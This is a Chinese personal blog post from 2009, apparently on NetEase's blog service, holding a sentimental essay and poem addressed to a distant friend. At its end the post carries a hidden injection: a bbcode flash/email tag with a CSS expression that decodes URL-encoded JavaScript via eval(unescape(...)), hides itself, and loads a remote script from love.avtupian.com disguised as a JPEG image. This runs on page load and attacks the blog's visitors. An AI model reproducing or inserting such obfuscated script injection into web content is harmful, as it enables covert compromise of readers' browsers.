登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

对未来的渴望与寻觅 对过去的回味与感慨

人生不可料,心情我做主。

 
 
 

日志

 
 

远方的朋友!你还好吗?  

2009-07-23 21:30:43|  分类: 影音数码 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
   真情的呼唤,真情的歌声。感动。朋友,你还好吗?远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖


远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖        远方的朋友你还好吗?时间如流水,岁月无情的变迁,也许我们都不愿意承受,可是我们却也无法摆脱人生中的聚聚散散,在我们这不见的岁月里,也许有许许多多的人在你的身边来了、去了!你是否还记得在你的友谊录里还有一个人-----我?
       远方的朋友你还好吗?我在这里想着、盼着、以至于喊着----何时我们能相逢,在那些失恋人的口中流传着“时间久了,感情淡了,相爱的人也就散了”可是我知道虽我们不曾相见,我知道在某个不经意的时间,你也许会想起我,你也许会像我一样发出人生的感概,因为我们是朋友,在你我之间有一条桥梁,友谊的桥梁,它将你我相连,虽然淡默的日子冲淡了许多,许多,可是它却像雨后的彩虹----在你我的不经意间放出七彩的光芒!~
       远方的朋友你还好吗?也许你也在承受着那些生活的无奈、也许你也在苦苦的求索、也许你已经超越自我、也许你已经沉沦在漫漫的人海,可是无论如何我都知道你在那一刻曾想起了我,因为那一刻我已在想你,因为我们是朋友,一个不分高低、不分大小、不分贵贱的词语。
       远方的朋友你还好吗?其实我还有好多话想说,汇成一句:我的朋友啊,我真的很想你!我想知道你的消息,我想知道远方的朋友你还好吗?
远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖




远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖



远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖朋友你还好吗?远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖

很想问一句:朋友你还好吗?
多日不见,你还好吗?
昔日的贫嘴变成今日的沉默,
往日的快乐都随风飘散,
不知道你最近还好吗?朋友?
每次看到沉默的头像,
都期盼你的闪烁,
每次有上线的提示,
都希望是你在敲门,
朋友,你还好吗?
知道我在想你吗?
真的想去远方看看你
闲暇的等待变成焦急的期盼,
内心的渴望变成对你的思念,
你知道远方有人想念你吗?
知道我在盼着你的回复吗?
即使是只言片语,
也胜过沉默不言。
听着悠扬的音乐,
往日的情怀从心底泛起,
对你的思念化作飘荡的旋律,
回荡在屋子的四周,
朋友,知道我在想你吗?


远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖

远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖

远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖

听着悠扬的音乐,  
往日的情怀从心底泛起,  
对你的思念化作飘荡的旋律,  
回荡在屋子的四周,  
朋友,知道我在想你吗?
远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖

虽然网络是虚拟的,但网络背后的你我必定真诚,感激网络中的你,温暖了我使我懂得了珍惜!





远方的朋友!你还好吗? - 啤酒胖胖 - 啤酒胖胖
                     [flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  评论这张
 
阅读(130)| 评论(2)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018